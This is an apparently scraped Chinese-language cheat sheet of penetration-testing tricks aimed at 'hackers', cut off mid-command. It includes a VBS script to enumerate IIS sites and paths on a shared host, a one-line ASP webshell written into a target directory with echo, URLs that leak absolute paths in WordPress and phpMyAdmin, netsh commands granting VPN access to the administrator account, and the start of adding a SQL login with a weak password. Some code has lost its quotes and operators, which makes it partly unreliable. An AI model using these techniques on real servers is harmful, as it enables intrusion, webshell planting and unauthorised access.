网络攻防---渗透技巧总结大全.docVIP

网络攻防渗透技巧总结大全（必威体育精装版版本） 本着共享之精神，方便各位黑阔童鞋，发表此文，希望抛砖引玉，童鞋们踊跃发言。使之更加完善，在交流中进步，形成良好的互动~ 旁站路径问题 1、读网站配置。 2、用以下VBSOn Error Resume Next If (LCase(Right(WScript.Fullname,11))=wscript.exe) Then Msgbox Space(12) IIS Virtual Web Viewer Space(12) Chr(13) Space(9) Usage:Cscript vWeb.vbs,4096,Lilo WScript.Quit End If Set ObjService=GetObject (IIS://LocalHost/W3SVC) For Each obj3w In objservice If IsNumeric(obj3w.Name) Then Set OService=GetObject(IIS://LocalHost/W3SVC/ obj3w.Name) Set VDirObj = OService.GetObject(IIsWebVirtualDir, ROOT) If Err 0 Then WScript.Quit (1) WScript.Echo Chr(10) [ OService.ServerComment ] For Each Binds In OService.ServerBindings Web = { Replace(Binds,:, } { ) } WScript.Echo Replace(Split(Replace(Web, ,),}{)(2),},) Next WScript.Echo Path : VDirObj.Path End If Next 复制代码3、iis_spy列举（注：需要支持ASPX，反IISSPY的方法：将activeds.dll，activeds.tlb降权） 4、得到目标站目录，不能直接跨的。通过echo ^%execute(request(cmd))%^ X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp 像目标目录写入webshell。或者还可以试试type命令. ————————————————————— WordPress的平台，爆绝对路径的方法是： url/wp-content/plugins/akismet/akismet.php url/wp-content/plugins/akismet/hello.php —————————————————————— phpMyAdmin暴路径办法: phpMyAdmin/libraries/select_lang.lib.php phpMyAdmin/darkblue_orange/layout.inc.php phpMyAdmin/index.php?lang[]=1 phpmyadmin/themes/darkblue_orange/layout.inc.php ———————————————————— 网站可能目录(注：一般是虚拟主机类） data/htdocs.网站/网站/ ———————————————————— CMD下操作VPN相关 netsh ras set user administrator permit #允许administrator拨入该VPN netsh ras set user administrator deny #禁止administrator拨入该VPN netsh ras show user #查看哪些用户可以拨入VPN netsh ras ip show config #查看VPN分配IP的方式 netsh ras ip set addrassign method = pool #使用地址池的方式分配IP netsh ras ip add range from = to = 54 #地址池的范围是从到54 ———————————————————— 命令行下添加SQL用户的方法 需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下: exec master.dbo.sp_addlogin test,123 EXEC sp_addsrvro